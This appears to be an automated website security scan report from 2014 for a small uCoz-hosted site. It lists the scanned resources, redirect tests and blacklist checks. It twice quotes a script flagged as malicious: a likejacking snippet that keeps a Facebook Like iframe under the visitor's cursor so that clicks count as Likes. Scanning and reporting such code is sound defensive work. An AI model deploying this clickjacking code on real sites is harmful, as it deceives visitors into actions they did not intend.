Scanned pages/files
Request | Server response | Status |
http://laiqebi.ga/news/2014-04-26-71 | 200 OK Content-Length: 55606 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'https://www.facebook.com/myfilmi.in') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80' + ' style="z-index:9999999999999999999999999999 }, 9000); function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 1) + 'px'; return true } })(); Antivirus reports:
| ||
http://s104.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s58.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://laiqebi.ga/designs_34/jquery.easing.js | 200 OK Content-Length: 8097 Content-Type: text/javascript | clean |
http://laiqebi.ga/designs_34/script.js | 200 OK Content-Length: 14174 Content-Type: text/javascript | clean |
http://laiqebi.ga/designs_34/scripts.js | 200 OK Content-Length: 866 Content-Type: text/javascript | clean |
http://counter.top.ge/cgi-bin/cod?100+95092 | 200 OK Content-Length: 374 Content-Type: application/x-javascript | clean |
http://links.boom.ge/jc.php?id=60048 | 200 OK Content-Length: 276 Content-Type: text/html | clean |
http://links.boom.ge/test404page.js | 404 Not Found Content-Length: 483 Content-Type: text/html | clean |
http://trafka.ru/code/popup.php?id=313 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 22 Oct 2014 06:25:25 GMT Location: http://www.trafka.ru/code/popup.php?id=313 Server: nginx Vary: Accept-Encoding Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.trafka.ru/code/popup.php?id=313 | 200 OK Content-Length: 153 Content-Type: text/html | clean |
http://laiqebi.ga//ajax.googleapis.com/ajax/libs/webfont/1.4.2/webfont.js/ | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://laiqebi.ga/ | 200 OK Content-Length: 62779 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'https://www.facebook.com/myfilmi.in') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80' + ' style="z-index:9999999999999999999999999999 }, 9000); function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 1) + 'px'; return true } })(); Antivirus reports:
| ||
http://connect.facebook.net/ka_GE/all.js | 200 OK Content-Length: 163835 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: laiqebi.ga
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Wed, 22 Oct 2014 06:25:26 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 8musicebiuCoz=; path=/; expires=Mon, 22-Oct-2012 06:25:25 GMT; domain=.laiqebi.ga;
Set-Cookie: 8musicebiuzll=1413959125; path=/; expires=Thu, 22-Oct-2015 06:25:25 GMT; domain=.laiqebi.ga;
Set-Cookie: 8musicebiuCoz=; path=/; expires=Mon, 22-Oct-2012 06:25:25 GMT; domain=.laiqebi.ga;
GET / HTTP/1.1
Host: laiqebi.ga
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Wed, 22 Oct 2014 06:25:26 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 8musicebiuCoz=; path=/; expires=Mon, 22-Oct-2012 06:25:25 GMT; domain=.laiqebi.ga;
Set-Cookie: 8musicebiuzll=1413959125; path=/; expires=Thu, 22-Oct-2015 06:25:25 GMT; domain=.laiqebi.ga;
Set-Cookie: 8musicebiuCoz=; path=/; expires=Mon, 22-Oct-2012 06:25:25 GMT; domain=.laiqebi.ga;
Second query (visit from search engine):
GET / HTTP/1.1
Host: laiqebi.ga
Referer: http://www.google.com/search?q=laiqebi.ga
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: laiqebi.ga
Referer: http://www.google.com/search?q=laiqebi.ga
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=laiqebi.ga
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://laiqebi.ga/
Result: laiqebi.ga is not infected or malware details are not published yet.
Result: laiqebi.ga is not infected or malware details are not published yet.